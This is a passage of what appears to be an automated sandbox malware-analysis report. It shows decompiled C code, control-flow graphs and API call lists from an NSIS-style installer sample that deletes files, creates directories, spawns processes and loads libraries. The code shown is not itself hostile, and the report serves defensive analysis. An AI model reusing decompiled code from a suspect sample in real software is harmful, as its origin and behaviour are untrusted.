                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID: 07y
                    • API String ID: 973152223-1660179758
                    • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                    • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
                    • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                    • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405D32 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 617 405d32-405d43 call 406139 620 405d73 617->620 621 405d45-405d4b 617->621 624 405d75-405d77 620->624 622 405d55 DeleteFileW 621->622 623 405d4d-405d53 RemoveDirectoryW 621->623 625 405d5b-405d5d 622->625 623->625 626 405d64-405d69 625->626 627 405d5f-405d62 625->627 626->620 628 405d6b-405d6d SetFileAttributesW 626->628 627->624 628->620
                    C-Code - Quality: 41%
                    			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406139(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                    0x00405d33
                    0x00405d3e
                    0x00405d43
                    0x00405d73
                    0x00000000
                    0x00405d73
                    0x00405d4a
                    0x00405d4b
                    0x00405d55
                    0x00405d4d
                    0x00405d4d
                    0x00405d4d
                    0x00405d5d
                    0x00405d69
                    0x00405d6d
                    0x00405d6d
                    0x00000000
                    0x00405d5f
                    0x00000000
                    0x00405d61

                    APIs
                      • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                      • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                    • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
                    • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$Attributes$DeleteDirectoryRemove
                    • String ID:
                    • API String ID: 1655745494-0
                    • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                    • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
                    • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                    • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406AE6 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 629 406ae6-406afe WaitForSingleObject 630 406b0e-406b10 629->630 631 406b00-406b0c call 406a77 WaitForSingleObject 630->631 632 406b12-406b25 GetExitCodeProcess 630->632 631->630
                    C-Code - Quality: 100%
                    			E00406AE6(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A77(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                    0x00406af7
                    0x00406b0e
                    0x00406b02
                    0x00406b0c
                    0x00406b0c
                    0x00406b19
                    0x00406b25

                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
                    • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CodeExitProcess
                    • String ID:
                    • API String ID: 2567322000-0
                    • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                    • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
                    • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                    • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 635 4015c1-4015d5 call 402da6 call 405fe8 640 401631-401634 635->640 641 4015d7-4015ea call 405f6a 635->641 643 401663-4022f6 call 401423 640->643 644 401636-401655 call 401423 call 40666e SetCurrentDirectoryW 640->644 649 401604-401607 call 405c1c 641->649 650 4015ec-4015ef 641->650 659 402c2a-402c39 643->659 660 40292e-402935 643->660 644->659 662 40165b-40165e 644->662 658 40160c-40160e 649->658 650->649 655 4015f1-4015f8 call 405c39 650->655 655->649 666 4015fa-4015fd call 405b9f 655->666 663 401610-401615 658->663 664 401627-40162f 658->664 660->659 662->659 667 401624 663->667 668 401617-401622 GetFileAttributesW 663->668 664->640 664->641 671 401602 666->671 667->664 668->664 668->667 671->658
                    C-Code - Quality: 86%
                    			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F6A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C1C( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B9F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040666E(0x7b4000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                    0x004015c1
                    0x004015c9
                    0x004015cc
                    0x004015d1
                    0x004015d5
                    0x004015d7
                    0x004015df
                    0x004015e1
                    0x004015e4
                    0x004015ea
                    0x00401604
                    0x00401607
                    0x004015ec
                    0x004015ec
                    0x004015ef
                    0x00000000
                    0x004015fa
                    0x004015fd
                    0x004015fd
                    0x004015ef
                    0x0040160e
                    0x00401615
                    0x00401624
                    0x00401624
                    0x00401617
                    0x0040161a
                    0x00401622
                    0x00000000
                    0x00000000
                    0x00401622
                    0x00401615
                    0x00401627
                    0x0040162b
                    0x0040162c
                    0x004015d7
                    0x00401634
                    0x00401663
                    0x004022f1
                    0x00401636
                    0x00401638
                    0x00401645
                    0x0040164d
                    0x00401655
                    0x0040165b
                    0x0040165b
                    0x00401655
                    0x00402c2d
                    0x00402c39

                    APIs
                      • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560,00000000), ref: 00405FF6
                      • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                      • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                      • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                    • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                    • String ID:
                    • API String ID: 1892508949-0
                    • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                    • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
                    • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                    • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406045 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E00406045(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040666E(0x7a4790, _a4);
				_t21 = E00405FE8(0x7a4790);
				if(_t21 != 0) {
					E004068F5(_t21);
					if(( *0x7a8ab8 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4790 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4790);
							_push(0x7a4790);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004069A4();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F89(0x7a4790);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F3D();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                    0x00406051
                    0x0040605c
                    0x00406060
                    0x00406067
                    0x00406073
                    0x00406083
                    0x00406085
                    0x0040609d
                    0x0040609e
                    0x004060a5
                    0x004060a6
                    0x00000000
                    0x00000000
                    0x00406089
                    0x00406090
                    0x00406098
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406090
                    0x004060a8
                    0x004060ae
                    0x00000000
                    0x004060bc
                    0x00406075
                    0x0040607b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040607b
                    0x00406062
                    0x00000000

                    APIs
                      • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                      • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560,00000000), ref: 00405FF6
                      • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                      • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                    • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560,00000000), ref: 0040609E
                    • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560), ref: 004060AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                    • String ID:
                    • API String ID: 3248276644-0
                    • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                    • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
                    • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                    • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8ad0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a8c =  *0x7a7a8c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
					}
				}
				return 0;
			}











                    0x0040138a
                    0x004013fa
                    0x0040139b
                    0x004013a0
                    0x00000000
                    0x00000000
                    0x004013a2
                    0x004013a3
                    0x004013ad
                    0x00000000
                    0x00401404
                    0x004013b0
                    0x004013b7
                    0x004013bd
                    0x004013be
                    0x004013c0
                    0x004013c2
                    0x004013b9
                    0x004013b9
                    0x004013ba
                    0x004013ba
                    0x004013c9
                    0x004013cb
                    0x004013f4
                    0x004013f4
                    0x004013c9
                    0x00000000

                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                    • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
                    • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                    • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405C51 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405C51(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f90->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                    0x00405c5a
                    0x00405c7a
                    0x00405c82
                    0x00405c87
                    0x00000000
                    0x00405c8d
                    0x00405c91

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3712363035-0
                    • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                    • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
                    • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                    • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406A3B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406A3B(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069CB(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                    0x00406a43
                    0x00406a46
                    0x00406a4d
                    0x00406a55
                    0x00406a61
                    0x00000000
                    0x00406a68
                    0x00406a58
                    0x00406a5f
                    0x00000000
                    0x00406a70
                    0x00000000

                    APIs
                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                      • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                      • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                      • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
